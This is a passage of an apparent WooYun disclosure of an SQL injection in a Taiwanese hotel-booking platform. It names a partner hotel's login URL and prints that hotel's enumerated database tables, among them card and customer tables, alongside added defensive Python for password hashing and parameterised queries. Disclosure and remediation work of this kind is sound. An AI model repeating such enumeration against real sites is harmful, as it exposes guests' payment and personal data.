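The login log above stores every password in plaintext, so an injection that reads the table hands out directly reusable credentials. As an added example (not code from the report or from the site), the Python below shows the pattern that removes that exposure: the member table stores a salted PBKDF2 hash, and the login log records who logged in from where and whether it succeeded, with no password column at all. The table layout, the work factor and the sample member are assumptions.

```python
import hashlib
import hmac
import os

# Added example (not code from the report or from the site): how a login
# table and a login log can be kept so that a dump of either exposes no
# reusable password. The layout is an assumption loosely modelled on the
# column names visible in the report (LoginName, LoginPass, IP, LoginTime).

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; assumed, tune per host


def hash_password(password, salt=None):
    """Return a self-describing string: algo$iterations$salt_hex$digest_hex."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


class MemberStore:
    """In-memory stand-in for the Login and MemberLoginLog tables."""

    def __init__(self):
        self.members = {}    # login_name -> password hash string (never plaintext)
        self.login_log = []  # (ip, login_name, success); there is no password column
        # Hash to verify against when the user does not exist, so that the
        # response time does not reveal which login names are registered.
        self._dummy = hash_password("unused-dummy-password")

    def register(self, login_name, password):
        self.members[login_name] = hash_password(password)

    def login(self, ip, login_name, password):
        stored = self.members.get(login_name, self._dummy)
        ok = verify_password(password, stored) and login_name in self.members
        self.login_log.append((ip, login_name, ok))
        return ok


def demo():
    """Constructed sample: one member, one good login, one failed login."""
    store = MemberStore()
    store.register("alice", "constructed-example-pw")  # constructed sample member
    store.login("203.0.113.5", "alice", "constructed-example-pw")
    store.login("203.0.113.5", "alice", "wrong-guess")
    return store


if __name__ == "__main__":
    for row in demo().login_log:
        print(row)
```

With this layout, a dump of the member table yields only salted, slow hashes, and a dump of the login log yields only names, source addresses and outcomes, which is all an audit trail needs.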


3. The 928 databases include 540+ partner-merchant databases:
For example FULIRESORT, which in lowercase is fuliresort

[image: f.jpg]


Clicking "Book now" actually opens this link: https://www.ezhotel.com.tw/fuliresort/index.php?__fromurl=1&hotelid=1

[image: f1.jpg]


https://www.ezhotel.com.tw/fuliresort/index.php?__fromurl=1&hotelid=1 is where you can log in

[image: f2.jpg]


Database: FULIRESORT
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| PromotionRoomQty | 6330 |
| LoginLogB | 5739 |
| RoomQty_Log | 5051 |
| RoomQty | 3050 |
| LoginLogC | 2318 |
| Access_User | 2071 |
| TBL_Log | 647 |
| LoginLog | 611 |
| DateInfo | 610 |
| PromotionDateInfo | 549 |
| Access_Sub | 367 |
| Access_Main | 196 |
| RoomFacilitiesInfo | 161 |
| PromotionPrice | 118 |
| CustInfo | 92 |
| HotelOrderListSSL | 73 |
| PromotionPlatform | 71 |
| Access_Title2 | 47 |
| Promotion | 40 |
| CardInfo | 35 |
| INVInfo | 35 |
| OrderInfo | 35 |
| PriceData | 25 |
| PriceData_Eng | 25 |
| HotelUsers | 16 |
| OrderInfoWaiting | 16 |
| AllowableIP | 12 |
| PromotionGroup | 12 |
| Access_Title1 | 11 |
| TK_ReportInfo | 11 |
| QtySet | 10 |
| Mail_Question | 9 |
| OrderInfo_Msg_Log | 8 |
| CancelSet | 7 |
| TK_ClassSet | 6 |
| TypeDef | 6 |
| TypeDef_Eng | 6 |
| PriceDef | 5 |
| PriceDef_Eng | 5 |
| RoomType | 5 |
| RoomType1 | 5 |
| RoomType2 | 5 |
| RoomType3 | 5 |
| RoomType4 | 5 |
| RoomType_Eng | 5 |
| PromotionPriceDef | 3 |
| PromotionPriceDef_Eng | 3 |
| ExtraServiceB | 2 |
| OrderNotice | 2 |
| ExtraService | 1 |
| HotelInfo | 1 |
| HotelInfo1 | 1 |
| HotelInfo2 | 1 |
| HotelInfo3 | 1 |
| HotelInfo4 | 1 |
| HotelInfo_Eng | 1 |
| TK_TicketOrderInfo | 1 |
+-----------------------+---------+

Suggested fix:

Sanitise the injection point and cast the parameter to an integer.
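As an added example of the fix suggested above (not code from the report or from the site), the Python below takes the `areano` parameter from the report's injection URL, whitelists its `<int>-<int>` shape, converts both halves to integers and binds them as query parameters, with the vulnerable string-concatenation version alongside for contrast. The `hotels` table, its columns and the sample rows are assumptions, run against an in-memory SQLite database.

```python
import re
import sqlite3

# Added example, not code from the report or from the site. The parameter name
# `areano` and the value shape `0-33` come from the injection URL in the report;
# the table name `hotels`, its columns and the sample rows are assumptions.

AREANO_RE = re.compile(r"\d{1,4}-\d{1,4}")


def parse_areano(raw):
    """Whitelist the parameter's shape and return (region, area) as integers.
    Anything that is not exactly <int>-<int> is rejected before any SQL is built."""
    if not AREANO_RE.fullmatch(raw):
        raise ValueError("areano must look like <int>-<int>")
    region, area = raw.split("-")
    return int(region), int(area)


def setup_db():
    """Constructed in-memory table standing in for the site's hotel data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE hotels (id INTEGER PRIMARY KEY, name TEXT, region INTEGER, area INTEGER)"
    )
    conn.executemany(
        "INSERT INTO hotels (name, region, area) VALUES (?, ?, ?)",
        [("Sample Hotel A", 0, 33), ("Sample Hotel B", 0, 34), ("Sample Hotel C", 1, 33)],
    )
    return conn


def hotels_vulnerable(conn, raw):
    """Before: the raw query-string value is spliced into the statement text.
    Whatever follows the hyphen becomes part of the SQL."""
    region, area = raw.split("-", 1)
    sql = "SELECT name FROM hotels WHERE region = %s AND area = %s" % (region, area)
    return [row[0] for row in conn.execute(sql)]


def hotels_fixed(conn, raw):
    """After: shape check, integer conversion, and a parameterised query.
    The driver sends the integers as bound values, never as statement text."""
    region, area = parse_areano(raw)
    sql = "SELECT name FROM hotels WHERE region = ? AND area = ?"
    return [row[0] for row in conn.execute(sql, (region, area))]


if __name__ == "__main__":
    conn = setup_db()
    print(hotels_fixed(conn, "0-33"))
    try:
        hotels_fixed(conn, "0-33 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

A plain integer cast is not enough on its own for this parameter, because `0-33` is two integers joined by a hyphen; the shape check plus bound parameters together guarantee that nothing from the query string ever becomes SQL text, and the same shape check is what a WAF rule or request log alert for this endpoint should key on.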

Copyright notice: please credit 路人甲@乌云 when reposting


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-03-08 03:16

Vendor reply:

Thanks for the report

Latest status:

None yet